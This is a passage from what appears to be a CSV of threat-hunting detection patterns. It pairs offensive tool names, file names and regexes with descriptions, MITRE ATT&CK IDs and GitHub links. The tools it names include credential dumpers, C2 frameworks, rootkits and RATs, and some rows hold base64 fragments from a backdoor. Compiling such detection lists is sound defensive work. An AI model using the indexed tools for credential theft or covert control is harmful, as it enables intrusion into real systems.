research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*VectorKernel\ModHide*",".{0,1000}VectorKernel\\ModHide.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*VectorKernel\StealToken*",".{0,1000}VectorKernel\\StealToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*VectorKernel-main.zip*",".{0,1000}VectorKernel\-main\.zip.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*vectra-ai-research/MAAD-AF*",".{0,1000}vectra\-ai\-research\/MAAD\-AF.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*veeam_credential_dump.*",".{0,1000}veeam_credential_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*veeam_dump*",".{0,1000}veeam_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*veeam_dump_mssql.ps1*",".{0,1000}veeam_dump_mssql\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*veeam_dump_postgresql.ps1*",".{0,1000}veeam_dump_postgresql\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*veeam-creds-main*",".{0,1000}veeam\-creds\-main.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from 
Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*Veeam-Get-Creds.ps1*",".{0,1000}Veeam\-Get\-Creds\.ps1.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*VeeamGetCreds.yaml*",".{0,1000}VeeamGetCreds\.yaml.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*veeampot.py*",".{0,1000}veeampot\.py.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*Vegile -*",".{0,1000}Vegile\s\-.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. 
There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","0","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*Venom Admin Node Start*",".{0,1000}Venom\sAdmin\sNode\sStart.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*Venom\agent\agent.go*",".{0,1000}Venom\\agent\\agent\.go.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*venv wapiti3*",".{0,1000}venv\swapiti3.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*Verified Merlin server *",".{0,1000}Verified\sMerlin\sserver\s.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*verovaleros/domain_analyzer*",".{0,1000}verovaleros\/domain_analyzer.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - 
TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*vh.4everproxy.com/secure/*",".{0,1000}vh\.4everproxy\.com\/secure\/.{0,1000}","offensive_tool_keyword","4everproxy","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://www.4everproxy.com/","1","1","this pattern could be observed in any proxyfied site","6","10","N/A","N/A","N/A","N/A" "*victim_host_generator.py*",".{0,1000}victim_host_generator\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*VID_03EB&PID_2403 *",".{0,1000}VID_03EB\&PID_2403\s.{0,1000}","offensive_tool_keyword","ducky","rubber ducky","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki","1","0","default vid and pid of the device - risk of false positives","10","1","2","0","2015-03-15T02:45:33Z","2015-03-15T02:45:31Z" "*VID_0483&PID_5740*",".{0,1000}VID_0483\&PID_5740.{0,1000}","offensive_tool_keyword","FlipperZero","Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://docs.flipper.net/qflipper/windows-debug","1","0","default vid and pid of the device - risk of false positives","10","10","N/A","N/A","N/A","N/A" "*viewdns-get-rootdomains-ip-ns *",".{0,1000}viewdns\-get\-rootdomains\-ip\-ns\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - 
T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*viewdns-get-rootdomains-whois *",".{0,1000}viewdns\-get\-rootdomains\-whois\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*Villain.git*",".{0,1000}Villain\.git.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*villain.py*",".{0,1000}villain\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*Villain/Core*",".{0,1000}Villain\/Core.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*villain_core.py*",".{0,1000}villain_core\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*vil-proxy/quickcert*",".{0,1000}vil\-proxy\/quickcert.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*vincent.letoux@gmail.com*",".{0,1000}vincent\.letoux\@gmail\.com.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*viper/*.sock*",".{0,1000}viper\/.{0,1000}\.sock.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*viper-dev.conf*",".{0,1000}viper\-dev\.conf.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*viperpython-dev*",".{0,1000}viperpython\-dev.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the 
process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*viperpython-main*",".{0,1000}viperpython\-main.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*viperzip.exe*",".{0,1000}viperzip\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*virajkulkarni14*",".{0,1000}virajkulkarni14.{0,1000}","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/virajkulkarni14","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Viralmaniar*",".{0,1000}Viralmaniar.{0,1000}","offensive_tool_keyword","Github 
Username","github username hosting post exploitation tools and recon tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Viralmaniar","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*VirTool:PowerShell/Scanpatch.A*",".{0,1000}VirTool\:PowerShell\/Scanpatch\.A.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*virtual-host-enumeration.py*",".{0,1000}virtual\-host\-enumeration\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*viRu5/GoogleChromeAutoLaunch.py*",".{0,1000}viRu5\/GoogleChromeAutoLaunch\.py.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*viRu5\GoogleChromeAutoLaunch.py*",".{0,1000}viRu5\\GoogleChromeAutoLaunch\.py.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*virusscan_bypass.rb*",".{0,1000}virusscan_bypass\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*VirusTotalC2.*",".{0,1000}VirusTotalC2\..{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. 
now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","7","82","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*Visual-Studio-BOF-template*",".{0,1000}Visual\-Studio\-BOF\-template.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*VITE_STRIKER_API*",".{0,1000}VITE_STRIKER_API.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*vletoux/MakeMeEnterpriseAdmin*",".{0,1000}vletoux\/MakeMeEnterpriseAdmin.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*vletoux/NTLMInjector*",".{0,1000}vletoux\/NTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*VlZSS2VrMVdWa2RhTTJScFVtdGFXbFJWWkc5VlZscFZVbXhLWVUxVlNsVlZWbU14V1ZVeGNXSkVTbGhoYTI4d1dXdGFjbVZYUmtsaVIyeE9ZV3RhZWxZeFdtOVdNREZJVTJwV1QxZElRbWhXTUZaMlpWWmtjMXBJVG14V2JYY3hWR3hrZDJGVk1YRlJibFpTVFc1Uk1GVXhXbEpsUmxKelZtdHdVMUpGU25WVk1qVjNVbXMxVmsxWVFrOVRSMmhRV1ZjeGEwMVdVbGRVVkVKc*",".{0,1000}VlZSS2VrMVdWa2RhTTJScFVtdGFXbFJWWkc5VlZscFZVbXhLWVUxVlNsVlZWbU14V1ZVeGNXSkVTbGhoYTI4d1dXdGFjbVZYUmtsaVIyeE9ZV3RhZWxZeFdtOVdNREZJVTJwV1QxZElRbWhXTUZaMlpWWmtjMXBJVG14V2JYY3hWR3hrZDJGVk1YRlJibFpTVFc1Uk1GVXhXbEpsUmxKelZtdHdVMUpGU25WVk1qVjNVbXMxVmsxWVFrOVRSMmhRV1ZjeGEwMVdVbGRVVkVKc.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Vm14YVUxTXlWbkpOVm1SWFlUSlNhRlJVU2xOalJsWjBaRWRHV0dKR1NsZFhhMk0xVm14YWMyTkdXbFppV0doTVYxWlZlRlpzVG5OV2JGcFhZbFV4TkZZeFdsWmxSMDVZVTJ0V1ZHSkhhRzlaVkVrMFpERmtXR1JIUm1waVZscFpWVzEwYzJGV1NYbGxSVGxhVmpOU2FGcFhlRnBsUm1SMFQxWmtUbEpGV2twV1ZFcDNWakZSZUZwRmJGSmlWMmhZVkZWYVlVMXNjRmRY*",".{0,1000}Vm14YVUxTXlWbkpOVm1SWFlUSlNhRlJVU2xOalJsWjBaRWRHV0dKR1NsZFhhMk0xVm14YWMyTkdXbFppV0doTVYxWlZlRlpzVG5OV2JGcFhZbFV4TkZZeFdsWmxSMDVZVTJ0V1ZHSkhhRzlaVkVrMFpERmtXR1JIUm1waVZscFpWVzEwYzJGV1NYbGxSVGxhVmpOU2FGcFhlRnBsUm1SMFQxWmtUbEpGV2twV1ZFcDNWakZSZUZwRmJGSmlWMmhZVkZWYVlVMXNjRmRY.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*VMSA-2023-0001.py*",".{0,1000}VMSA\-2023\-0001\.py.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product 
","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*VMware detected!!!*",".{0,1000}VMware\sdetected!!!.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*vmware_view_planner*uploadlog_rce*",".{0,1000}vmware_view_planner.{0,1000}uploadlog_rce.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
